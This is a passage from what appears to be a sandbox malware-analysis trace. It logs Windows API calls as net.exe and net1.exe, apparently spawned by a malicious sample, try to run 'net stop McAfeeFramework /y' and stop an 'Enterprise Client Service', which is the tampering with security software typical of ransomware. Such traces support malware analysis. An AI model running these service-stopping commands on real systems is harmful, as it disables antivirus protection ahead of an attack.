lpSystemTimeAsFileTime=0x29fe40 | out: lpSystemTimeAsFileTime=0x29fe40*(dwLowDateTime=0x4734f420, dwHighDateTime=0x1d57a87)) [0211.414] GetCurrentProcessId () returned 0x82c [0211.414] GetCurrentThreadId () returned 0x580 [0211.414] GetTickCount () returned 0x116e6f6 [0211.415] QueryPerformanceCounter (in: lpPerformanceCount=0x29fe38 | out: lpPerformanceCount=0x29fe38*=33169919530) returned 1 [0211.415] GetModuleHandleA (lpModuleName=0x0) returned 0x810000 [0211.415] __set_app_type (_Type=0x1) [0211.415] __p__fmode () returned 0x74eb31f4 [0211.415] __p__commode () returned 0x74eb31fc [0211.415] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x81ffe6) returned 0x0 [0211.415] __getmainargs (in: _Argc=0x829064, _Argv=0x82906c, _Env=0x829068, _DoWildCard=0, _StartInfo=0x829024 | out: _Argc=0x829064, _Argv=0x82906c, _Env=0x829068) returned 0 [0211.415] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.415] GetConsoleOutputCP () returned 0x1b5 [0211.416] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x829080 | out: lpCPInfo=0x829080) returned 1 [0211.416] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.418] sprintf_s (in: _DstBuf=0x29fdf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0211.419] setlocale (category=0, locale=".437") returned="English_United States.437" [0211.420] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0211.420] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0211.420] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFramework /y" [0211.420] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fbc4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0211.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x72) returned 0x68f788 [0211.421] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0211.421] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fdc8 | out: Buffer=0x29fdc8*=0x691c78) returned 0x0 [0211.421] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fdc8 | out: Buffer=0x29fdc8*=0x691c90) returned 0x0 [0211.421] _fileno (_File=0x74eb2900) returned -2 [0211.421] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0211.421] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0211.421] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0211.421] _wcsicmp (_String1="config", _String2="stop") returned -16 [0211.421] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0211.421] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0211.421] _wcsicmp (_String1="file", _String2="stop") returned -13 [0211.421] _wcsicmp (_String1="files", _String2="stop") returned -13 [0211.421] _wcsicmp (_String1="group", _String2="stop") returned -12 [0211.421] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0211.421] _wcsicmp (_String1="help", _String2="stop") returned -11 [0211.421] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0211.421] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0211.421] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0211.422] _wcsicmp (_String1="session", _String2="stop") returned -15 [0211.422] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0211.422] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0211.422] _wcsicmp (_String1="share", _String2="stop") returned -12 [0211.422] _wcsicmp (_String1="start", _String2="stop") returned -14 [0211.422] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0211.422] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0211.422] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0211.422] _wcsicmp (_String1="accounts", _String2="McAfeeFramework") returned -12 [0211.422] _wcsicmp (_String1="computer", _String2="McAfeeFramework") returned -10 [0211.422] _wcsicmp (_String1="config", _String2="McAfeeFramework") returned -10 [0211.422] _wcsicmp (_String1="continue", _String2="McAfeeFramework") returned -10 [0211.422] _wcsicmp (_String1="cont", _String2="McAfeeFramework") returned -10 [0211.422] _wcsicmp (_String1="file", _String2="McAfeeFramework") returned -7 [0211.422] _wcsicmp (_String1="files", _String2="McAfeeFramework") returned -7 [0211.422] _wcsicmp (_String1="group", _String2="McAfeeFramework") returned -6 [0211.422] _wcsicmp (_String1="groups", _String2="McAfeeFramework") returned -6 [0211.422] _wcsicmp (_String1="help", _String2="McAfeeFramework") returned -5 [0211.422] _wcsicmp (_String1="helpmsg", _String2="McAfeeFramework") returned -5 [0211.422] _wcsicmp (_String1="localgroup", _String2="McAfeeFramework") returned -1 [0211.422] _wcsicmp (_String1="pause", _String2="McAfeeFramework") returned 3 [0211.422] _wcsicmp (_String1="session", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="sessions", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="sess", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="share", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="start", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="stats", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="statistics", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="stop", _String2="McAfeeFramework") returned 6 [0211.422] _wcsicmp (_String1="time", _String2="McAfeeFramework") returned 7 [0211.422] _wcsicmp (_String1="user", _String2="McAfeeFramework") returned 8 [0211.422] _wcsicmp (_String1="users", _String2="McAfeeFramework") returned 8 [0211.422] _wcsicmp (_String1="msg", _String2="McAfeeFramework") returned 16 [0211.422] _wcsicmp (_String1="messenger", _String2="McAfeeFramework") returned 2 [0211.422] _wcsicmp (_String1="receiver", _String2="McAfeeFramework") returned 5 [0211.422] _wcsicmp (_String1="rcv", _String2="McAfeeFramework") returned 5 [0211.422] _wcsicmp (_String1="netpopup", _String2="McAfeeFramework") returned 1 [0211.423] _wcsicmp (_String1="redirector", _String2="McAfeeFramework") returned 5 [0211.423] _wcsicmp (_String1="redir", _String2="McAfeeFramework") returned 5 [0211.423] _wcsicmp (_String1="rdr", _String2="McAfeeFramework") returned 5 [0211.423] _wcsicmp (_String1="workstation", _String2="McAfeeFramework") returned 10 [0211.423] _wcsicmp (_String1="work", _String2="McAfeeFramework") returned 10 [0211.423] _wcsicmp (_String1="wksta", _String2="McAfeeFramework") returned 10 [0211.423] _wcsicmp (_String1="prdr", _String2="McAfeeFramework") returned 3 [0211.423] _wcsicmp (_String1="devrdr", _String2="McAfeeFramework") returned -9 [0211.423] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeFramework") returned -1 [0211.423] _wcsicmp (_String1="server", _String2="McAfeeFramework") returned 6 [0211.423] _wcsicmp (_String1="svr", _String2="McAfeeFramework") returned 6 [0211.423] _wcsicmp (_String1="srv", _String2="McAfeeFramework") returned 6 [0211.423] _wcsicmp (_String1="lanmanserver", _String2="McAfeeFramework") returned -1 [0211.423] _wcsicmp (_String1="alerter", _String2="McAfeeFramework") returned -12 [0211.423] _wcsicmp (_String1="netlogon", _String2="McAfeeFramework") returned 1 [0211.423] _wcsupr (in: _String="McAfeeFramework" | out: _String="MCAFEEFRAMEWORK") returned="MCAFEEFRAMEWORK" [0211.423] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x695460 [0211.426] GetServiceKeyNameW (in: hSCManager=0x695460, lpDisplayName="MCAFEEFRAMEWORK", lpServiceName=0x82aaf0, lpcchBuffer=0x29fd64 | out: lpServiceName="", lpcchBuffer=0x29fd64) returned 0 [0211.426] _wcsicmp (_String1="msg", _String2="MCAFEEFRAMEWORK") returned 16 [0211.426] _wcsicmp (_String1="messenger", _String2="MCAFEEFRAMEWORK") returned 2 [0211.426] _wcsicmp (_String1="receiver", _String2="MCAFEEFRAMEWORK") returned 5 [0211.426] _wcsicmp (_String1="rcv", _String2="MCAFEEFRAMEWORK") returned 5 [0211.426] _wcsicmp (_String1="redirector", _String2="MCAFEEFRAMEWORK") returned 5 [0211.426] _wcsicmp (_String1="redir", _String2="MCAFEEFRAMEWORK") returned 5 [0211.426] _wcsicmp (_String1="rdr", _String2="MCAFEEFRAMEWORK") returned 5 [0211.426] _wcsicmp (_String1="workstation", _String2="MCAFEEFRAMEWORK") returned 10 [0211.426] _wcsicmp (_String1="work", _String2="MCAFEEFRAMEWORK") returned 10 [0211.426] _wcsicmp (_String1="wksta", _String2="MCAFEEFRAMEWORK") returned 10 [0211.426] _wcsicmp (_String1="prdr", _String2="MCAFEEFRAMEWORK") returned 3 [0211.426] _wcsicmp (_String1="devrdr", _String2="MCAFEEFRAMEWORK") returned -9 [0211.426] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEFRAMEWORK") returned -1 [0211.426] _wcsicmp (_String1="server", _String2="MCAFEEFRAMEWORK") returned 6 [0211.426] _wcsicmp (_String1="svr", _String2="MCAFEEFRAMEWORK") returned 6 [0211.426] _wcsicmp (_String1="srv", _String2="MCAFEEFRAMEWORK") returned 6 [0211.427] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEFRAMEWORK") returned -1 [0211.427] _wcsicmp (_String1="alerter", _String2="MCAFEEFRAMEWORK") returned -12 [0211.427] _wcsicmp (_String1="netlogon", _String2="MCAFEEFRAMEWORK") returned 1 [0211.427] NetServiceControl (in: servername=0x0, service="MCAFEEFRAMEWORK", opcode=0x0, arg=0x0, bufptr=0x29fd60 | out: bufptr=0x29fd60) returned 0x889 [0211.427] wcscpy_s (in: _Destination=0x82a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0211.428] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0211.428] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x82b338, nSize=0x800, Arguments=0x829dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0211.429] GetFileType (hFile=0x26c) returned 0x3 [0211.429] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x693f90 [0211.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x693f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0211.430] WriteFile (in: hFile=0x26c, lpBuffer=0x693f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29fca0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fca0, lpOverlapped=0x0) returned 0 [0211.430] LocalFree (hMem=0x693f90) returned 0x0 [0211.430] GetFileType (hFile=0x26c) returned 0x3 [0211.430] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x696238 [0211.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x696238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ni", lpUsedDefaultChar=0x0) returned 2 [0211.430] WriteFile (in: hFile=0x26c, lpBuffer=0x696238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fca0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fca0, lpOverlapped=0x0) returned 0 [0211.430] LocalFree (hMem=0x696238) returned 0x0 [0211.430] _ultow (in: _Dest=0x889, _Radix=2751696 | out: _Dest=0x889) returned="2185" [0211.430] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x82b338, nSize=0x800, Arguments=0x829dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0211.430] GetFileType (hFile=0x26c) returned 0x3 [0211.430] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x696238 [0211.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x696238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0211.430] WriteFile (in: hFile=0x26c, lpBuffer=0x696238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29fcac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fcac, lpOverlapped=0x0) returned 0 [0211.431] LocalFree (hMem=0x696238) returned 0x0 [0211.431] GetFileType (hFile=0x26c) returned 0x3 [0211.431] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x696238 [0211.431] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x696238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ni", lpUsedDefaultChar=0x0) returned 2 [0211.431] WriteFile (in: hFile=0x26c, lpBuffer=0x696238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fcac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fcac, lpOverlapped=0x0) returned 0 [0211.431] LocalFree (hMem=0x696238) returned 0x0 [0211.433] NetApiBufferFree (Buffer=0x691c78) returned 0x0 [0211.433] NetApiBufferFree (Buffer=0x691c90) returned 0x0 [0211.433] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFramework /y" [0211.433] exit (_Code=2) Process: id = "296" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x17a8000" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 469 os_tid = 0x784 Process: id = "297" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x495f0000" os_pid = "0x868" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "296" os_parent_pid = "0x7dc" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 470 os_tid = 0x3f4 [0211.580] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefa24 | out: lpSystemTimeAsFileTime=0xefa24*(dwLowDateTime=0x474cc1e0, dwHighDateTime=0x1d57a87)) [0211.580] GetCurrentProcessId () returned 0x868 [0211.580] GetCurrentThreadId () returned 0x3f4 [0211.580] GetTickCount () returned 0x116e792 [0211.580] QueryPerformanceCounter (in: lpPerformanceCount=0xefa1c | out: lpPerformanceCount=0xefa1c*=33186457279) returned 1 [0211.580] GetModuleHandleA (lpModuleName=0x0) returned 0x350000 [0211.580] __set_app_type (_Type=0x1) [0211.580] __p__fmode () returned 0x74eb31f4 [0211.580] __p__commode () returned 0x74eb31fc [0211.580] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x35ffe6) returned 0x0 [0211.581] __getmainargs (in: _Argc=0x369064, _Argv=0x36906c, _Env=0x369068, _DoWildCard=0, _StartInfo=0x369024 | out: _Argc=0x369064, _Argv=0x36906c, _Env=0x369068) returned 0 [0211.581] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.581] GetConsoleOutputCP () returned 0x1b5 [0211.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x369080 | out: lpCPInfo=0x369080) returned 1 [0211.581] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.584] sprintf_s (in: _DstBuf=0xef9dc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0211.584] setlocale (category=0, locale=".437") returned="English_United States.437" [0211.586] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0211.586] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0211.586] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y" [0211.586] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef7a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0211.586] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9a) returned 0x463c48 [0211.587] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0211.587] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef9ac | out: Buffer=0xef9ac*=0x461ca8) returned 0x0 [0211.587] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef9ac | out: Buffer=0xef9ac*=0x461cc0) returned 0x0 [0211.587] _fileno (_File=0x74eb2900) returned -2 [0211.587] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0211.587] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0211.587] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0211.587] _wcsicmp (_String1="config", _String2="stop") returned -16 [0211.587] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0211.587] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0211.587] _wcsicmp (_String1="file", _String2="stop") returned -13 [0211.587] _wcsicmp (_String1="files", _String2="stop") returned -13 [0211.587] _wcsicmp (_String1="group", _String2="stop") returned -12 [0211.587] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0211.587] _wcsicmp (_String1="help", _String2="stop") returned -11 [0211.587] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0211.587] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0211.587] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0211.587] _wcsicmp (_String1="session", _String2="stop") returned -15 [0211.587] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0211.587] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0211.587] _wcsicmp (_String1="share", _String2="stop") returned -12 [0211.587] _wcsicmp (_String1="start", _String2="stop") returned -14 [0211.587] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0211.587] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0211.588] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0211.588] _wcsicmp (_String1="accounts", _String2="ΓÇ£Enterprise") returned -850 [0211.588] _wcsicmp (_String1="computer", _String2="ΓÇ£Enterprise") returned -848 [0211.588] _wcsicmp (_String1="config", _String2="ΓÇ£Enterprise") returned -848 [0211.588] _wcsicmp (_String1="continue", _String2="ΓÇ£Enterprise") returned -848 [0211.588] _wcsicmp (_String1="cont", _String2="ΓÇ£Enterprise") returned -848 [0211.588] _wcsicmp (_String1="file", _String2="ΓÇ£Enterprise") returned -845 [0211.588] _wcsicmp (_String1="files", _String2="ΓÇ£Enterprise") returned -845 [0211.588] _wcsicmp (_String1="group", _String2="ΓÇ£Enterprise") returned -844 [0211.588] _wcsicmp (_String1="groups", _String2="ΓÇ£Enterprise") returned -844 [0211.588] _wcsicmp (_String1="help", _String2="ΓÇ£Enterprise") returned -843 [0211.588] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Enterprise") returned -843 [0211.588] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Enterprise") returned -839 [0211.588] _wcsicmp (_String1="pause", _String2="ΓÇ£Enterprise") returned -835 [0211.588] _wcsicmp (_String1="session", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="sessions", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="sess", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="share", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="start", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="stats", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="statistics", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="stop", _String2="ΓÇ£Enterprise") returned -832 [0211.588] _wcsicmp (_String1="time", _String2="ΓÇ£Enterprise") returned -831 [0211.588] _wcsicmp (_String1="user", _String2="ΓÇ£Enterprise") returned -830 [0211.588] _wcsicmp (_String1="users", _String2="ΓÇ£Enterprise") returned -830 [0211.588] _wcsicmp (_String1="msg", _String2="ΓÇ£Enterprise") returned -838 [0211.588] _wcsicmp (_String1="messenger", _String2="ΓÇ£Enterprise") returned -838 [0211.588] _wcsicmp (_String1="receiver", _String2="ΓÇ£Enterprise") returned -833 [0211.588] _wcsicmp (_String1="rcv", _String2="ΓÇ£Enterprise") returned -833 [0211.588] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Enterprise") returned -837 [0211.588] _wcsicmp (_String1="redirector", _String2="ΓÇ£Enterprise") returned -833 [0211.588] _wcsicmp (_String1="redir", _String2="ΓÇ£Enterprise") returned -833 [0211.588] _wcsicmp (_String1="rdr", _String2="ΓÇ£Enterprise") returned -833 [0211.588] _wcsicmp (_String1="workstation", _String2="ΓÇ£Enterprise") returned -828 [0211.588] _wcsicmp (_String1="work", _String2="ΓÇ£Enterprise") returned -828 [0211.589] _wcsicmp (_String1="wksta", _String2="ΓÇ£Enterprise") returned -828 [0211.589] _wcsicmp (_String1="prdr", _String2="ΓÇ£Enterprise") returned -835 [0211.589] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Enterprise") returned -847 [0211.589] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Enterprise") returned -839 [0211.589] _wcsicmp (_String1="server", _String2="ΓÇ£Enterprise") returned -832 [0211.589] _wcsicmp (_String1="svr", _String2="ΓÇ£Enterprise") returned -832 [0211.589] _wcsicmp (_String1="srv", _String2="ΓÇ£Enterprise") returned -832 [0211.589] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Enterprise") returned -839 [0211.589] _wcsicmp (_String1="alerter", _String2="ΓÇ£Enterprise") returned -850 [0211.589] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Enterprise") returned -837 [0211.589] _wcsicmp (_String1="accounts", _String2="Client") returned -2 [0211.589] _wcsicmp (_String1="computer", _String2="Client") returned 3 [0211.589] _wcsicmp (_String1="config", _String2="Client") returned 3 [0211.589] _wcsicmp (_String1="continue", _String2="Client") returned 3 [0211.589] _wcsicmp (_String1="cont", _String2="Client") returned 3 [0211.589] _wcsicmp (_String1="file", _String2="Client") returned 3 [0211.589] _wcsicmp (_String1="files", _String2="Client") returned 3 [0211.589] _wcsicmp (_String1="group", _String2="Client") returned 4 [0211.589] _wcsicmp (_String1="groups", _String2="Client") returned 4 [0211.589] _wcsicmp (_String1="help", _String2="Client") returned 5 [0211.589] _wcsicmp (_String1="helpmsg", _String2="Client") returned 5 [0211.589] _wcsicmp (_String1="localgroup", _String2="Client") returned 9 [0211.589] _wcsicmp (_String1="pause", _String2="Client") returned 13 [0211.589] _wcsicmp (_String1="session", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="sessions", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="sess", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="share", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="start", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="stats", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="statistics", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="stop", _String2="Client") returned 16 [0211.589] _wcsicmp (_String1="time", _String2="Client") returned 17 [0211.590] _wcsicmp (_String1="user", _String2="Client") returned 18 [0211.590] _wcsicmp (_String1="users", _String2="Client") returned 18 [0211.590] _wcsicmp (_String1="msg", _String2="Client") returned 10 [0211.590] _wcsicmp (_String1="messenger", _String2="Client") returned 10 [0211.590] _wcsicmp (_String1="receiver", _String2="Client") returned 15 [0211.590] _wcsicmp (_String1="rcv", _String2="Client") returned 15 [0211.590] _wcsicmp (_String1="netpopup", _String2="Client") returned 11 [0211.590] _wcsicmp (_String1="redirector", _String2="Client") returned 15 [0211.590] _wcsicmp (_String1="redir", _String2="Client") returned 15 [0211.590] _wcsicmp (_String1="rdr", _String2="Client") returned 15 [0211.590] _wcsicmp (_String1="workstation", _String2="Client") returned 20 [0211.590] _wcsicmp (_String1="work", _String2="Client") returned 20 [0211.590] _wcsicmp (_String1="wksta", _String2="Client") returned 20 [0211.590] _wcsicmp (_String1="prdr", _String2="Client") returned 13 [0211.590] _wcsicmp (_String1="devrdr", _String2="Client") returned 1 [0211.590] _wcsicmp (_String1="lanmanworkstation", _String2="Client") returned 9 [0211.590] _wcsicmp (_String1="server", _String2="Client") returned 16 [0211.590] _wcsicmp (_String1="svr", _String2="Client") returned 16 [0211.590] _wcsicmp (_String1="srv", _String2="Client") returned 16 [0211.590] _wcsicmp (_String1="lanmanserver", _String2="Client") returned 9 [0211.590] _wcsicmp (_String1="alerter", _String2="Client") returned -2 [0211.590] _wcsicmp (_String1="netlogon", _String2="Client") returned 11 [0211.590] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0211.590] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.591] wcscpy_s (in: _Destination=0xef4ac, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0211.591] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a00000 [0211.591] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0xef4a8, nSize=0x0, Arguments=0xef4a4 | out: lpBuffer="噠Fneth.dll") returned 0xff [0211.593] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0211.593] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.593] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0211.593] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r 